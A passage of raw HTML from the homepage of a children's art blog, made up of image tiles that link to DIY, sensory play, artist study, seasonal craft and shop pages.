class="tve_image wp-image-15694" alt="" width="279" height="300" title="home_rainbow_pompom" data-id="15694" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644639576" style=""><p style="text-align: center;"><a data-css="tve-u-16644637b07" href="https://www.artbarblog.com/category/diy/"><strong>DIY</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664463e726" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/recipesplay/"><img class="tve_image wp-image-15691" alt="" width="279" height="300" title="home_model_magic_slime" data-id="15691" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644640706" style=""><p style="text-align: center;"><a data-css="tve-u-16644642a2e" href="https://www.artbarblog.com/category/recipesplay/"><strong>SENSORY PLAY</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644643e51" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/artist-study/"><img class="tve_image wp-image-15692" alt="" width="279" height="300" title="home_okeeffe" data-id="15692" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166446480cb" style=""><p style="text-align: center;"><a data-css="tve-u-16644646951" href="https://www.artbarblog.com/category/artist-study/"><strong>ARTIST STUDIES</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv_text_element tcb-mobile-hidden" data-css="tve-u-166445b9f34" style=""><p data-css="tve-u-166445c6262" style="text-align: center;"><strong>BOOKS &amp; PARTIES</strong></p></div><div class="thrv_wrapper thrv_text_element tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-1664465e256" style=""><p data-css="tve-u-16644672a9b" style="text-align: center;"><strong>BOOKS &amp; PARTIES</strong></p></div><div class="thrv_wrapper thrv-columns tcb-mobile-hidden" data-css="tve-u-16644024c6b"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442fa780" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/my-book/"><img class="tve_image wp-image-15682" alt="" width="279" height="300" title="home_art_workshop" data-id="15682" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644504dd0" style=""><p style="text-align: center;"><a data-css="tve-u-166445042e4" href="https://www.artbarblog.com/my-book/"><strong>ART WORKSHOP</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442fb125" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/cardboard-creations/" target="_blank" rel=""><img class="tve_image wp-image-15688" alt="" width="279" height="300" title="home_cardboard_creations" data-id="15688" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166444bfdca" style=""><p style="text-align: center;"><a data-css="tve-u-166444c4c3a" href="https://www.artbarblog.com/cardboard-creations/" target="_blank"><strong>CARDBOARD CREATIONS</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442fbb5e" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/classes/"><img class="tve_image wp-image-15685" alt="" width="279" height="300" title="home_bday_parties3" data-id="15685" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166442fd0d3" style=""><p data-css="tve-u-166442ffec5" style="text-align: center;"><a data-css="tve-u-16644322cd7" href="https://www.artbarblog.com/classes/"><strong>BIRTHDAY PARTIES</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-1664466167b"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166446773ef" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/my-book/"><img class="tve_image wp-image-15682" alt="" width="279" height="300" title="home_art_workshop" data-id="15682" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_workshop.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664467abab" style=""><p style="text-align: center;"><a data-css="tve-u-1664467954b" href="https://www.artbarblog.com/my-book/"><strong>ART WORKSHOP</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664467b9da" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/cardboard-creations/"><img class="tve_image wp-image-15688" alt="" width="279" height="300" title="home_cardboard_creations" data-id="15688" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_cardboard_creations.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664467ebea" style=""><p style="text-align: center;"><a data-css="tve-u-1664467d2ec" href="https://www.artbarblog.com/cardboard-creations/"><strong>CARDBOARD CREATIONS</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664467fc15" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/classes/"><img class="tve_image wp-image-15685" alt="" width="279" height="300" title="home_bday_parties3" data-id="15685" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bday_parties3.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644681641" style=""><p data-css="tve-u-166442ffec5" style="text-align: center;"><a data-css="tve-u-16644682422" href="https://www.artbarblog.com/classes/"><strong>BIRTHDAY PARTIES</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv_text_element tcb-mobile-hidden" data-css="tve-u-166445cb800" style=""><p data-css="tve-u-166445ca36c" style="text-align: center;"><strong>SEASONAL ART IDEAS</strong></p></div><div class="thrv_wrapper thrv_text_element tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-166446639a2" style=""><p data-css="tve-u-16644683922" style="text-align: center;"><strong>SEASONAL ART IDEAS</strong></p></div><div class="thrv_wrapper thrv-columns tcb-mobile-hidden" data-css="tve-u-1664402f75c"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644013340" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=spring"><img class="tve_image wp-image-15686" alt="" width="279" height="300" title="home_bird_nests" data-id="15686" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664440489f" style=""><p style="text-align: center;"><a data-css="tve-u-1664441ee44" href="https://www.artbarblog.com/?s=spring"><strong>SPRING</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644016472" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=summer"><img class="tve_image wp-image-15699" alt="" width="279" height="300" title="home_summer_art_ideas" data-id="15699" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664437b549"><p style="text-align: center;"><a data-css="tve-u-166443827b2" href="https://www.artbarblog.com/?s=summer"><strong>SUMMER</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166440183c9" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=fall"><img class="tve_image wp-image-15693" alt="" width="279" height="300" title="home_painted_leaves" data-id="15693" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644519be7" style=""><p style="text-align: center;"><a data-css="tve-u-16644518ee1" href="https://www.artbarblog.com/?s=fall"><strong>FALL</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-16644665f1e"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664468f651" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=spring"><img class="tve_image wp-image-15686" alt="" width="279" height="300" title="home_bird_nests" data-id="15686" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bird_nests.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644693686" style=""><p style="text-align: center;"><a data-css="tve-u-16644691d5b" href="https://www.artbarblog.com/?s=spring"><strong>SPRING</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166446944d7" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=summer"><img class="tve_image wp-image-15699" alt="" width="279" height="300" title="home_summer_art_ideas" data-id="15699" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_summer_art_ideas.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644696100" style=""><p style="text-align: center;"><a data-css="tve-u-16644696e17" href="https://www.artbarblog.com/?s=summer"><strong>SUMMER</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644697779" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=fall"><img class="tve_image wp-image-15693" alt="" width="279" height="300" title="home_painted_leaves" data-id="15693" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_painted_leaves.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664469a717" style=""><p style="text-align: center;"><a data-css="tve-u-16644699440" href="https://www.artbarblog.com/?s=fall"><strong>FALL</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-mobile-hidden" data-css="tve-u-16644036842"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664452a3f7" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=winter"><img class="tve_image wp-image-15705" alt="" width="286" height="300" title="home-winter_vacation" data-id="15705" src="//www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644524a25" style=""><p style="text-align: center;"><a data-css="tve-u-166445286bb" href="https://www.artbarblog.com/?s=winter"><strong>WINTER</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664452ab0c" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=thanksgiving"><img class="tve_image wp-image-15704" alt="" width="286" height="300" title="home-thanksgiving" data-id="15704" src="//www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166443b64fc" style=""><p style="text-align: center;"><a data-css="tve-u-166443b48a1" href="https://www.artbarblog.com/?s=thanksgiving"><strong>THANKSGIVING</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664452b55d" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=christmas"><img class="tve_image wp-image-15689" alt="" width="286" height="300" title="home_christmas_tree_assemblage" data-id="15689" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166444a8add" style=""><p style="text-align: center;"><a data-css="tve-u-166444a5add" href="https://www.artbarblog.com/?s=christmas"><strong>CHRISTMAS</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-166446681f5" style=""><div class="tcb-flex-row tcb--cols--3 v-2"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664469b787" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=winter"><img class="tve_image wp-image-15705" alt="" width="286" height="300" title="home-winter_vacation" data-id="15705" src="//www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-winter_vacation.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664469cf7a" style=""><p style="text-align: center;"><a data-css="tve-u-1664469da4a" href="https://www.artbarblog.com/?s=winter"><strong>WINTER</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664469ead1" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=thanksgiving"><img class="tve_image wp-image-15704" alt="" width="286" height="300" title="home-thanksgiving" data-id="15704" src="//www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-thanksgiving.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166446a16b0" style=""><p style="text-align: center;"><a data-css="tve-u-1664469fda2" href="https://www.artbarblog.com/?s=thanksgiving"><strong>THANKSGIVING</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166446a2232" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/?s=christmas"><img class="tve_image wp-image-15689" alt="" width="286" height="300" title="home_christmas_tree_assemblage" data-id="15689" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_christmas_tree_assemblage.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166446a3df0" style=""><p style="text-align: center;"><a data-css="tve-u-166446a4875" href="https://www.artbarblog.com/?s=christmas"><strong>CHRISTMAS</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv_text_element tcb-mobile-hidden" data-css="tve-u-166445d0239" style=""><p data-css="tve-u-166445ceb57" style="text-align: center;"><strong>SHOP ART BAR</strong></p></div><div class="thrv_wrapper thrv_text_element tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-1664466a40e" style=""><p data-css="tve-u-166446a651b" style="text-align: center;"><strong>SHOP ART BAR</strong></p></div><div class="thrv_wrapper thrv-columns tcb-mobile-hidden" data-css="tve-u-1664403e798"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" style="" data-css="tve-u-1664446a9e6"><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/art-class-poster/"><img class="tve_image wp-image-15725" alt="" width="600" height="630" title="home_art_class_poster" data-id="15725" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster.jpg 600w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_art_class_poster-595x625.jpg 595w" sizes="(max-width: 600px) 100vw, 600px" /></a></span></div><div class="thrv_wrapper thrv_text_element" style="" data-css="tve-u-1664445f930"><p style="text-align: center;"><strong></strong><a data-css="tve-u-166444722c8" href="https://www.artbarblog.com/art-class-poster/"><strong>ART CLASS POSTER</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col" style=""><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644538b88" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.etsy.com/shop/ArtBarShop/" target="_blank"><img class="tve_image wp-image-15703" alt="" width="286" height="300" title="home-Etsy" data-id="15703" src="//www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Etsy.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" style="" data-css="tve-u-16644537925"><p style="text-align: center;"><strong></strong><a data-css="tve-u-1664453f5a0" href="https://www.etsy.com/shop/ArtBarShop/" target="_blank"><strong>ETSY</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166445394f1" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://itunes.apple.com/us/app/artsy-emojis/id1273353695?mt=8" target="_blank"><img class="tve_image wp-image-15702" alt="" width="286" height="300" title="home-Artsy_Emojis" data-id="15702" src="//www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home-Artsy_Emojis.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" style="" data-css="tve-u-1664442aa1d"><p style="text-align: center;"><a 